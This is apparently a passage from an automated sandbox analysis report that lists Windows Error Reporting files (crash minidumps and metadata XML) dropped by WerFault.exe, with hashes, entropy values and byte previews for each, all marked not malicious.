SHA-512:	297E3EDE04AAB3D253BB7A722545A50B4548825893B794720F5E58BA0629E9595DA71C58CDE0784536F7389555BE3794E659EFE7CFC383AED241E168EAED3D5F
Malicious:	false
Preview:	MDMP..a..... ..........f....................................<...........d....=..........`.......8...........T............#..........................................................................................................eJ......l.......GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER25F2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.709175106123965
Encrypted:	false
SSDEEP:	192:R6l7wVeJVqA6I6u6YSJSUvMfgmf4QpB089b3SsfLdm:R6lXJ36I6u6Y8SUv8gmf4m3Rf8
MD5:	B8C6BE9BB4E189FE64A262568062D782
SHA1:	24D7735802B61294670D7F27347AA96E79FA9F85
SHA-256:	9E205E386F8FBCC340AD18FA7952AAA29E341B8AA6AB381A621DE3C9E0D3C652
SHA-512:	AA70BC37F224E43DAE6BE70C177275783C49DB6371E68B9740B04B85BF71917AA446E96A0F86FA1B5C26FBF3D1C9E6C7F4045AFEA993A496B0F375F637B31012
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2612.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.508369673207438
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjp9Ym8M4JQJKF6s+q8+p1nXlGfd:uIjfxI7j37VWcJQEt1nXlGfd
MD5:	923DAB733B6C695987DF41B49528ABDB
SHA1:	4241FA5256DBAAFDFE720489954A86F2BAB405FE
SHA-256:	CF08A513CAB43A791C7E7F6C1225EA5C326DEE9B292D9CA7317F6179EA334D08
SHA-512:	7F6FD2B18188477D50C292E03069D4D8B2A2F528186DD5D23B3DD01886617832AB10FA5AEE4A4A0D6CA6D5320040CC6570B3D59162716D9BA67EEFBE49D5C3A2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER290E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	95818
Entropy (8bit):	2.1841851483637504
Encrypted:	false
SSDEEP:	384:aoquxqbpr/WvVMe+kcPR5XVonzueofwDB/CBo:d9xqbpT62pFeuedCB
MD5:	DC3BC809937E79461656BDBD162F2ED0
SHA1:	545514F0306AA4A5BAA91678F0FF72490A7EBEFD
SHA-256:	EF908691D0507160A0120E04633CDC4E4F65FC4E3EE1D373031923F2192EBB37
SHA-512:	36CD325CAEC3220FEC839C9E9B3413A9D8B28D3BA04FDD248494DCC3A5126070996BEB5F443FFC240E1FF6111F07D10FDB5BF7432ECFCB89C316CB72C02A2538
Malicious:	false
Preview:	MDMP..a..... ..........f........................P...........<...H............@..........`.......8...........T............#...R......................p...............................................................................eJ..............GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BFD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7093994904459002
Encrypted:	false
SSDEEP:	192:R6l7wVeJVj+6ss6YSjSULEgmf4QpBM89bFSsfqR3m:R6lXJp+636Y2SULEgmf4+FRfT
MD5:	72DB947FB39A7B83B1C7C90CD4C5498F
SHA1:	17D53D341DE6353B7B8649D1930BF2811D1840E2
SHA-256:	29475F4B69117FBFB348EAA0ADE145A77731B1385740C87803B4226FEE5764D9
SHA-512:	FEF0C3A2FA12A94CB1636ADE50C6AF37496FB0FFF957822A60678F5435372868014D220814745FC5930EB99A4B66A6DD90ADC0899D2946AB1A4510D11810108C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C1D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.507344217548434
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjpLYm8M4JQJKFL+q8+p1nXlGfd:uIjfxI7j37VWOJQet1nXlGfd
MD5:	E40E426C69E5AC1C37CADB6C114E30D3
SHA1:	A904DB9EA5A8415E802D30183FE79A9E9F5C60F3
SHA-256:	C096610AA21F8C8B31A30B7C54AC47FAF06B1A00EE0127653A2F87075B867472
SHA-512:	3B646B3931A8E940E81A52DF7BE0191141332AF97AD1E4535FAA906DAE4B751386D22F0789E173AD81BCDC4715C63CAB5C3AE55C6817125334FA7A0CA267FEB2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E5D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	107060
Entropy (8bit):	2.0807670866570325
Encrypted:	false
SSDEEP:	384:6q0j6S8BObptsEDUpNt9leisC3qRPJIFwjBMd/KQowvjz3:1OpTbpts5t9MLC3qRhITp/L
MD5:	73552AE56BCA526E59F433F7E5B71A60
SHA1:	36992BC09A7DEE274AA7EF9A639C49ACA1948BED
SHA-256:	F20D9C6C1B65BA304AC6BBEC019C1E1FEA2D716D3B40E1B8DA5DA9797D5AC335
SHA-512:	D6AAF600627B38856B6C42CFF0C02F87BD49C0E84A1D1DFF9098F2B8A188E34987CD7E017804F325A6443261DAD82DD87BEB7FB213DE1E8AD11B88A923AF0DF1
Malicious:	false
Preview:	MDMP..a..... ..........f............................(.......<...............LI..........`.......8...........T...........`(...y....................... ..............................................................................eJ......p!......GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F29.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.710151993198845
Encrypted:	false
SSDEEP:	192:R6l7wVeJVi6/ie+6YSYSUEcgmf4QpB089bSSsfNvmm:R6lXJA6C6YdSUEcgmf4mSRfd
MD5:	4EE43A684FEE91A5DF7CB4DD87C40294
SHA1:	F07CBD3CE047BD8254F83783F274A08113A383FA
SHA-256:	DEF36B06AD6A2A659DC03838C34EF3E53DA336A037C88B13CB15CB23B5092EF4
SHA-512:	634948A362B72C6E7E0A97F27E7F9E4EF519C5CA1CF530580AC0C827E43D1FF56897C57EB0BF62CAD5E1FABCC521782D212192E44F846D75AFB972554F10D9CA
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F49.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.509020780453951
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjp/Ym8M4JQJKFcI+q8+p1nXlGfd:uIjfxI7j37VWiJQnIt1nXlGfd
MD5:	90FEE2BE6E20D72A6909F86BD6533652
SHA1:	90ED224B2CAE17D686FC099CB0E6EA25BDB0ADBB
SHA-256:	2C2038929B37307EEDE6F28568A1D4A0CA14DFCDD7DF9079B3FFC607131FBD8D
SHA-512:	C901CA16F4B177C13F6B75FFB473E822C3B13F081B7BAD1134CCBC185EB672FDA84F9E1BAA8F5A9D1D02E1DF7332091CC0FED308683521A51FCDF43BFBBA1EA5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER310C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:28 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	104786
Entropy (8bit):	1.9601318581797829
Encrypted:	false
SSDEEP:	384:TauQo64+bptVSLbND6as+ljF2VXdTIiIJfus:W3A+bpt4bN2F+qai8m
MD5:	74522F5620E2A5731D6974DDCACA386B
SHA1:	78CF3A33F695DEFBC54166E9CAE066451FB6D6AB
SHA-256:	60CA4FBB602DFD8234154225030F5488EE73494D8B5B46DECA9C6D52289E9698
SHA-512:	474A5C3E5B4ED00D3408A224FAAA797AF2A7C19EE6CBED5617A7AABC8A08F2F23D912B0D7D1C610B0A45F5FAF3237121ED210EC913F57DC2853CAD0C7D5CE407
Malicious:	false
Preview:	MDMP..a..... ..........f............D...............X.......<...$ ......t....M..........`.......8...........T............*...n..........` ..........L"..............................................................................eJ......."......GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31AA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8356
Entropy (8bit):	3.7092880291172188
Encrypted:	false
SSDEEP:	192:R6l7wVeJV46/VC5J6YSJSUv2agmf4QpBa89bSSsf0zmm:R6lXJ66tyJ6YsSUv7gmf40SRfe
MD5:	44EDB4A47C87D3A57A4C9D0803023FD0
SHA1:	4CCD826A2F0DDCD4423372825ED3B1E7CBDEBCA4
SHA-256:	5E6C7D245A8844AA03D31093190AC81CAC2D0B27C043B0AAA90C138A7BF43E22
SHA-512:	8BD14EFD40A69053E2ACD37E08A2F5F8EBDE9CBF167FF93519C9336936D7DFEF4B7D21A586833056CA91D7D41FBFAF87E91CC9EDD85F8BF62D4B517BEC719903
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER31DA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.511957158293426
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjpcYm8M4JQJKFYu+q8+p1nXlGfd:uIjfxI7j37VW5JQxut1nXlGfd
MD5:	B2A4735D5BC3AD12F6A7A16A9F239682
SHA1:	9C5D45D65FB85782DB8A467CC192C82F5FB4BE0E
SHA-256:	E27B358121E3A29ED46096C853E7702D911654803D79C5D2F450A1D9E0DAEAC8
SHA-512:	5E83E7DE789B741D497F28098E3AD33BB281FA3272019F41B3A6F1B585C5D389A0535A76CA7014C15B2F93B706E4D071ECB60B6044028452DAB403D04E3F8D6A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36AA.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:30 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	112614
Entropy (8bit):	1.9796462437133457
Encrypted:	false
SSDEEP:	384:0zOgNCwPA2bptgUFkezWxole+7vFRjsUIWqa6g:UnswPA2bptgvUWGle6vmz
MD5:	BB2E55B1F439DAE2012E0A68233F3AA3
SHA1:	76D518254088FF0B9D951D25125CA3A16E4E9125
SHA-256:	FD170B0087507F076D7AEADE822E94C2B7EBE6D4975D6E5E1C3AE662AA209A4A
SHA-512:	8042D41B3F50A225791A489114092F77807167887FB9A000F8397A813F474EF6FA7040E60B5847F7B04CD5EFF518DB18BA1C1FDA686909A666F0BEA6086494A1
Malicious:	false
Preview:	MDMP..a..... ..........f............t.......................<...T ...........P..........`.......8...........T...........p,..v............ ..........\|"..............................................................................eJ.......#......GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3757.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8356
Entropy (8bit):	3.709790298379567
Encrypted:	false
SSDEEP:	192:R6l7wVeJVf6g6YST1SUVRgmf4QpBr89b7Ssf9CJm:R6lXJ96g6YMSUVRgmf4b7Rff
MD5:	1BE1EEE9FF14015A6C72CDFB998F8803
SHA1:	43E8AF45FFC48AA13101F51F7D6FB02001FFDF16
SHA-256:	D1DCB308DF9BB66850C019AC28BADE32CADC77BDB747134000612983A61320F5
SHA-512:	5F35B363E4D8F75F4CBF9EEDD50323EC740BEBC58DFB3394EC19A40798F23CFD9E4A32231D526AFFDCB0F9DA0FB6D573C6465DB171F491E5276EBA651897E21D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER37B6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.5083179362556125
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjyYm8M4JQJKFIxM+q8+p1nXlGfd:uIjfxI7j37VqJQet1nXlGfd
MD5:	F80C05EC15E315499353E063C2A6BE32
SHA1:	E33C847531B76282E72117F39274700B1828C46F
SHA-256:	4BF5E1A362F133BC4FAE62F1802BFE0FBB988B9ED48D871187A13585855FBDAF
SHA-512:	D818A5D4466F155A12BA0ABB51878A2E00CE841944C2045E3EB72E0DFBAE72157B38E77CB16C20F09FD0EA06CFD2D4647C729328B009CE33DE51DC95BCEFE372
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4D.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44486
Entropy (8bit):	2.55250912849301
Encrypted:	false
SSDEEP:	192:r38/1XrGMT/5BXrAX0wJObPhOF2FxWz6N4sqLXIqwiA6WvgB/prw3MhkpPWuYUke:rs1GMThtTbpto6NMai/hw3MKx7Ug
MD5:	DD17BD6697B5186FB32A7235F8179306
SHA1:	99B8E618791E0FBA8E4D5124A4411B0BF66F782F
SHA-256:	2E66676FCB620580BF2A91EDC170852B2D9A40BD5DCDBB494D0BD83B45109E26
SHA-512:	3A9A648D04C487A088246211E25DBC70D1E78DE1DDBAEBE998DE61478AA4976D71D345BD4040E65DAB63F418DBBD4FCF39A432696CC9A221E7BAA4F438F862AB
Malicious:	false
